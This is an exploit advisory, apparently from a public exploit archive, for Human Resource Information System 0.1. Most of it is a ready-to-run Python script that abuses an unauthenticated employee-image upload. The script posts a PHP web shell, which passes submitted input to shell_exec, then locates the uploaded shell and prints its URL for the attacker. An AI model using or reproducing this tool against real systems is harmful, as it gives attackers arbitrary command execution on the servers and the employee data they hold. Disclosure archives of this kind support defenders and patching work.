Human Resource Information System 0.1 Remote Code Execution (Unauthenticated)

2021.05.07
Credit: Reza Afsahi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) # Date: 04-05-2021 # Exploit Author: Reza Afsahi # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html # Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code # Version: 0.1 # Tested on: PHP 7.4.11 , Linux x64_x86 ############################################################################################################ # Description: # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. ############################################################################################################ # Proof of concept: #!/usr/bin/python3 import requests import sys from bs4 import BeautifulSoup def find_shell(domain): req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php") soup = BeautifulSoup(req_2.content , "html.parser") imgs = soup.find_all("img") for i in imgs: src = i['src'] if ("shell.php" in src): print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n") break else: continue def upload_file(domain): print("\n [!] Uploading Shell . . .") payload = """ <!DOCTYPE html> <html> <head> <title> Shell </title> </head> <body> <form action="#" method="post"> <input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ..."> <br><br> <input type="submit" name="submit" value="execute"> </form> <?php $cmd = $_POST['cmd']; $result = shell_exec($cmd); echo "<pre>{$result}</pre>"; ?> </body> </html> """ h = { "Content-Type" : "multipart/form-data" } f = {'employee_image':('shell.php',payload, 'application/x-php', {'Content-Disposition': 'form-data'} ) } d = { "emplo" : "", "employee_companyid" : "test", "employee_firstname" : "test", "employee_lastname" : "test", "employee_middlename" : "test", "branches_datefrom" : "0011-11-11", "branches_recentdate" : "2222-11-11", "employee_position" : "test", "employee_contact" : "23123132132", "employee_sss" : "test", "employee_tin" : "test", "employee_hdmf_pagibig" : "test", "employee_gsis" : "test" } url = domain + "/Admin_Dashboard/process/addemployee_process.php" req = requests.post(url , data=d , files = f) if req.status_code == 200: if ("Insert Successfully" in req.text): print("\n [!] Shell uploaded succefully\n") find_shell(domain) else: print("Exploit Failed 1") def main(): if len(sys.argv) != 2: print('[!] usage: %s <target url> ' % sys.argv[0]) print('[!] eg: %s http://vulndomain.com' % sys.argv[0]) sys.exit(-1) print("<><><><><><><><><><><><><><><><><><><><><><><><>") print("<> Human Resource Information System <>") print("<> Shell Uploader <>") print("<><><><><><><><><><><><><><><><><><><><><><><><>") target_domain = sys.argv[1] upload_file(target_domain) if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top